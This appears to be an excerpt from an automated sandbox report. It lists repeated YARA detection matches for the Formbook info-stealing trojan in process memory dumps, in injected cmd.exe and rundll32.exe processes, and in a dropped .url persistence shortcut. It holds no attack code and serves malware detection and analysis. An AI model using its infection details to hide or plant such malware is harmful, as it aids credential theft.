            Source: 5.0.cmd.exe.50410000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 5.0.cmd.exe.50410000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 5.0.cmd.exe.50410000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 5.0.cmd.exe.50410000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 5.0.cmd.exe.50410000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 5.0.cmd.exe.50410000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 5.0.cmd.exe.50410000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 5.0.cmd.exe.50410000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 5.0.cmd.exe.50410000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 5.2.cmd.exe.50410000.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 5.2.cmd.exe.50410000.4.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 5.2.cmd.exe.50410000.4.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 5.0.cmd.exe.50410000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 5.0.cmd.exe.50410000.2.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 5.0.cmd.exe.50410000.2.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 5.0.cmd.exe.50410000.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 5.0.cmd.exe.50410000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 5.0.cmd.exe.50410000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 5.0.cmd.exe.50410000.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 5.0.cmd.exe.50410000.3.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 5.0.cmd.exe.50410000.3.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000005.00000002.411833760.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.411833760.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000005.00000002.411833760.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0000001D.00000002.768343844.0000000000D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000001D.00000002.768343844.0000000000D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0000001D.00000002.768343844.0000000000D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000000.00000002.278080538.0000000003CE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000000.00000002.278080538.0000000003CE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000000.00000002.278080538.0000000003CE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000007.00000000.366747947.000000000D346000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000007.00000000.366747947.000000000D346000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000007.00000000.366747947.000000000D346000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000008.00000002.328666768.000000000366B000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000008.00000002.328666768.000000000366B000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000008.00000002.328666768.000000000366B000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000005.00000002.407639397.00000000036E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.407639397.00000000036E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000005.00000002.407639397.00000000036E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000005.00000002.407600284.00000000036B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.407600284.00000000036B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000005.00000002.407600284.00000000036B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000008.00000002.329116862.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000008.00000002.329116862.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000008.00000002.329116862.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000005.00000000.273665319.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000000.273665319.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000005.00000000.273665319.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000005.00000000.274126698.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000000.274126698.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000005.00000000.274126698.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000005.00000000.275130208.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000000.275130208.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000005.00000000.275130208.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0000001D.00000002.773383896.0000000001020000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000001D.00000002.773383896.0000000001020000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0000001D.00000002.773383896.0000000001020000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000007.00000000.393025016.000000000D346000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000007.00000000.393025016.000000000D346000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000007.00000000.393025016.000000000D346000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000005.00000000.274615202.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000000.274615202.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000005.00000000.274615202.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0000001D.00000002.766540425.0000000000940000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000001D.00000002.766540425.0000000000940000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0000001D.00000002.766540425.0000000000940000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: Process Memory Space: TR0627729920002.exe PID: 5932, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: Process Memory Space: cmd.exe PID: 564, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: Process Memory Space: Jwjxmakrv.exe PID: 2460, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: Process Memory Space: rundll32.exe PID: 4684, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: C:\Users\Public\Libraries\vrkamxjwJ.url, type: DROPPED Matched rule: Methodology_Shortcut_HotKey author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, score = 27.09.2019, reference = https://twitter.com/cglyer/status/1176184798248919044
